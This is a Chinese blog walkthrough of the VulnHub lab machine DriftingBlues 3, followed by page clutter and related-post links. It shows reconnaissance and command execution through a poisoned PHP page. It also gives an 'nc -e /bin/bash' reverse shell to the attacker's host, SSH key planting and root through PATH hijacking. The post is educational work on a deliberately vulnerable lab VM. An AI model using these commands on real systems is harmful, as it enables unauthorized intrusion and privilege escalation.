Vulnhub_driftingblues

已于 2022-03-12 21:58:23 修改
阅读量1.5k 收藏
点赞数
分类专栏: vulnhub 文章标签: linux ssh php
于 2022-03-12 14:53:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60936698/article/details/123443765
版权

主机信息

kali: 192.168.58.128

driftingblues3: 192.168.58.131

信息收集

老规矩先用nmap扫描

nmap -sP ip/mask \\扫描局域网内存活主机

nmap -sV -A -p- ip \\扫描靶机开放服务

发现开启了俩个端口 22:ssh   80:http

ssh登入,且用户名为一句话木马

进入网页瞅瞅(啥也不是)

用dirb盘一下,用字典来扫描Web服务,找找目录

注:(dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站)

格式:dirb <url_base> [<wordlist_file(s)>] [options]

-a 设置user-agent

-p <proxy[:port]>设置代理

-c 设置cookie

-z 添加毫秒延迟,避免洪水攻击

-o 输出结果

-X 在每个字典的后面添加一个后缀

-H 添加请求头

-i 不区分大小写搜索

发现里面有个文档,进去瞅瞅

Robots.txt又给了个目录,再瞅瞅看

Emmm,又给个目录,再再瞅瞅

这回啥也没有(翻译的有点骚)

 

按下F12瞅瞅源码,源码里有东西

去头尾解析俩次后,又一个路径,但这回是php路径

view-source:http://192.168.58.131/adminsfixit.php直接浏览网页源代码

可以看见我之前搞的ssh登入记录

使用下面的语句进行执行命令:

view-source:http://192.168.58.131/adminsfixit.php?xioazeng=id

view-source:http://192.168.58.131/adminsfixit.php?xioazeng=ip a

可以执行命令!!!

搞个反弹shell:

view-source:http://192.168.58.131/adminsfixit.php?xioazeng=nc -e /bin/bash 192.168.58.128 1226

看得有点怪怪的,使用python获取一个交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

 

进入家目录发现打不开user的flag,查看.ssh发现里面没有ras
查看ssh配置文件/etc/ssh/sshd_config,发现可以使用公钥登入,并且给出了文件名/home/robertj/.ssh/authorized_keys

创一个公钥

ssh-keygen -t rsa

/home/robertj/.ssh/rsa_keys

查看生成的公钥和私钥信息,并将私钥复制存放到本地

重命名文件

使用私钥登入,发现权限太高:

修改一下文件权限:

chmod 700 id_rsa   

使用私钥登入成功

可以使用find提权:

第一个flag

第二个flag在root中

应该是执行了ip a、cat /etc/hosts、uname -a的命令
这时我们修改其中一个命令即可获得root权限


首先进入/tmp/创建uname文件,写入/bin/bash

发现进不去

然后赋予文件777权限和将环境变了指向/tmp/目录

这时执行命令将跳转到root权限

第二个flag

魔同
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub-Nagini.txt
06-10
Nagini
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 539
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
Vulnhub靶机:driftingblues 1
qq_48904485的博客
01-13 890
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues1(10.0.2.17)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/
VulnHub-DRIFTINGBLUES: 3
sanqin_的博客
07-11 576
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/driftingblues-3,656/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可见开发了两个端口,22:ssh,80:http 在网站一阵遨游后没发现啥(其实就随便看看),上dirb robots.txt给出了一个目录 访问,提示说ssh有问题,并且又给出一个目录, 这次页面提
VulnHubDRIFTINGBLUES: 7
weixin_42075643的博客
04-28 723
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
vulnhub--DriftingBlues: 1
weixin_45922278的博客
03-28 1129
描述 获得标志 难度:容易 关于vm:已测试并从virtualbox导出 目录 1.nmap端口扫描 2.目录扫描 二、漏洞探测&利用 三、getshell & 提权 四、总结 一、信息收集 1.nmap端口扫描 nmap -A -T4 -v -p- 192.168.43.73 2.目录扫描 先将driftingblues.box加入到hosts文件中。 gobuster dir -u http://driftingblues.box...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub篇potato.zip
01-12
Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1549
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
VulnHub DC: 4
spider的博客
12-01 226
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
VulnHub-driftingblues:9
热门推荐
江左盟的博客
06-20 1万+
简介 信息收集 扫 管理地址 啊 漏洞发现 漏洞利用 权限提升
Vulnhub-DriftingBlues-7
weixin_50342860的博客
08-16 348
@TOC 简介 靶机下载:DriftingBlue-7 运行环境: 攻击机:kali 受害机:DriftingBlues-7 目标:夺到里面的flag 下载好靶机,直接打开(这里使用的是VM,模式选择NAT),如图 信息收集 扫描当前网段存活主机 查看端口及运行服务 查看服务版本 目录扫描 dirsearch 安装方法:点这里 扫描出来的目录没啥大发现 发现漏洞及利用漏洞 访问80端口会被跳转到如下页面 尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 801
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
linux 之dma_buf (4)- mmap
z20230508的博客
05-28 926
前面几篇都是在 kernel space 对 dma-buf 进行访问的,本篇我们将一起来学习,如何在 user space 访问 dma-buf。当然,user space 访问 dma-buf 也属于 CPU Access 的一种。
FTP协议——LightFTP安装(Linux
计算机硕士的博客
05-27 356
FTP协议——LightFTP安装(Linux)。
Linux C/C++时间操作
最新发布
qq_40135848的博客
06-02 327
Linux C/C++时间操作
Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 841
Linux】升级GCC(版本9.3),补充:binutils
vulnhub sar
09-09
vulnhub sar是一个类似OSCP的虚拟机,它旨在帮助用户提高和巩固渗透测试的知识点。如果你想下载sar靶机,你可以在GitHub上找到它,具体来说,你可以在pentestmonkey的php-reverse-shell存储库中找到它。如果你已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值